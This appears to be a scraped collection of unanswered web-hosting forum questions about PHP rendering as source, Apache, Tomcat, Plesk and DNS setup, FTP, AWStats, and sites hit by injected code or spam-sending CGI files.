i already restart the httpd but everytime I go to my website, php page is now showing my php page as php code. :/
i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.
my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce
I have a starnge code in my websites pages, I found it yesterday and i went to clean the pages.
Now after about 12 hours it came back again, It is not possible to moniter
like this problem and clean a huge number of pages.
I dont know how this happened, I need someone to help me to know the source of the problem from where it comes.

I have webcam robots and they use only one controller at a time from my website.
So I need a queue system on a website, because sometimes lots of people want to control my robots and i am tired of changing passwords / IP and linking and so on.
Its to work something like this.
They click on a button that say "Control Webcam-robot" on a website and get linked to a website where they see were in the queue they are and estimate time it take to get control.
When they get first in line they get linked to my control web site.
Or is there any similar code / script to look at and modifie?

I recently configured a Centos 6.5 server with Java JDK1.8 and the bundled Tomcat server X64 application. I confirmed the web server port is not already in use and also installed the Tomcat APR libraires. The application starts fine and all the logs show no severe errors however when I navigate to te URL I see a blank page. All the configuration files are in tthe correct place and whether I use just :8080 or /licenseserver the page is still blank. If I run the element inspector in the browser it shows 404 file not found.
View 2 Replies View RelatedI am trying to ftp some changes to my site. The strange thing is that while the FTP client (Filezilla) is accepting the new file, it will not show up on the new site. I've tried caching, refreshing browers, and rebooting but nada.
I then went back into my FTP client and checked the timestamp of the file being uploaded. For whatever reason, it will not show the most recent time of the file being uploaded, much less accept the most recent upload.

I have installed an SSL certificate on my website since last saturday the 1st of May, and forced redirection to https URLs via .htaccess.
Since then, I cannot see any statistics in AWStats. All values stops after the implementation of the certificate. How can I continue to have statistics for my secured web site ?
this is wierd. I use 1and1 to host some of my sites. I used Dreamweaver to modify / update the site.
I never had a problem before using Dreamweaver's built-in FTP tools.
But for somereason, when I connect to the server now, all I can see is a TXT file, which when I open, says that if I have frontpage extensions open this is all I will see.
But the thing is, I Went into my admin account, and I don't have frontpage extensions.
I even tried creating another FTP account with a more direct link to the site instead of all my site files. This one didn't help either, same thing.
I just update my apache today. I remove them and update to latest version 2.2.8. It's works well but when I try to vist my homepage my website is gone but my domain still works and after I login to filemanager in lxadmin all my file is there! :O I only saw this apache default page.
How can I point my index page to my domain? I think name server is not a problem because I can vist my website with my domain name.
I've recently opened an account at a shared webhosting, cPanel managed. I've assigned it the main domain name I plan to use, but currently that domain points to another webhosting.
Before I proceed with the change of nameservers and make the definitive switch from the old to the new host, is there any way I can privately preview my site (100% HTML) from the new host? I'd like to ensure it's working OK before making the jump.
I've tried to add an entry to my local HOSTS file assigning my domain to the new host IP, but I only get a default page from the new server.

Two month ago I installed plesk 11.5 on my server (with centos 6 or 7 I don't remember) Then i added my domain.com by clicking on "Add New Domain" and using the auto dns system configuration. All worked great. During this period, Parallels Plesk was auto updating to 12.x 1 week ago, I restarted my server, and my website was down (I think because DNS problem with 12.x or ip problem or port closed...)
So I formatted my dedicated server, then I reinstall Parallels Plesk 11 (with centos 6) and the website worked great. Then I re-formatted my dedicated server, then I installed Parallels Plesk 12 (with centos 7) and the website did not work.
So I think the problem come from plesk 12
This is how I process to configure my website on plesk 12 :
1. This is a 1&1 domain and an OVH dedicated server.
So I configure DNS like that :
1rst name server : nsXXXXXX.eu
2nd name server : sdns2.ovh.net
2. On plesk, i click on "Add New Domain"

We have a few hosting plans setup with different "allowances" for each.The website permissions allow basic html and PHP.In Windows Advanced: The website settings allow for html, php, asp and asp.net
When we change a Basic Hosting plan to Windows Advanced using "Change Plan", it will reassign the subscription/domain to use the new plan, but it will not add-on the extra features in Hosting Settings.

I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?

If I load a php file on browser, it gets loaded, but in HTML source I can see php code.
If I run in SSH "php info.php", the php code gets runn and normal output is generated.

I recompiled Apache and PHP few times, both from WHM and from SSH. I reinstalled Zend optimizer.
We are testing a module that we think may improve stability on our webservers. The module limits the number of concurrent connections allowed from any particular ip address.
What I need an opinion on is what error message the server should return when it is refusing because of the limit.
The module currently returns a 503 error, that's what the module's author set it to do. 503 is a temporary error, which is good, but it implies that the problem is with the server, which seems somewhat inaccurate to me.
I was thinking a 409 would be good, with text saying that the request conflicts with the per visitor connection limit for the requested resource. Ideally the browser would display the message and people would know to reconfigure software or wait for existing connections to complete before resubmitting the request.
One of my co-workers here says that at least people understand the "server busy" error and they won't understand the "conflict" message.
Someone else says most of these errors will come from folks using http 1.0 and the 409 doesn't exist at that level of the protocol, so they won't get anything more than a generic "error!" type of message.

I have a customer who is hosting a website on a dedicated server. The server is a high spec server with Intel Core 2 DUO E8400 processor, 4 GB DDR2 ECC RAM and a SATA Hard Drive. He is running only a single website which has a data entry section. The problem is that a few scripts when run consume 99% of the CPU. In fact, there is a particular script which even if run alone consumes 99% CPU. The code retrieves some records from the database by running an SQL query. The code is never executed. I have checked the sql query in the code and it runs fine if executed in SQL Query Analyzer. I know the problem is somewhere in the code, but cannot find the exact cause. Is there a tool to debug the asp code and find out may be the issue with the code? I have tried the Debug Diagnostics utility,

My server work in centos.
I am currently developing a web application on a WAMP server. Once complete my client will have some in-house "programmers" make changes to the code as they are needed.
My client wants to track all changes made to the source files (ie- who made the change, when it was made, what files were modified, and what specific lines were added/removed/modified). Also, the program must run on the server and not the programmers computers.
I've searched high and low and only found a couple programs that scratch the surface of what they want.
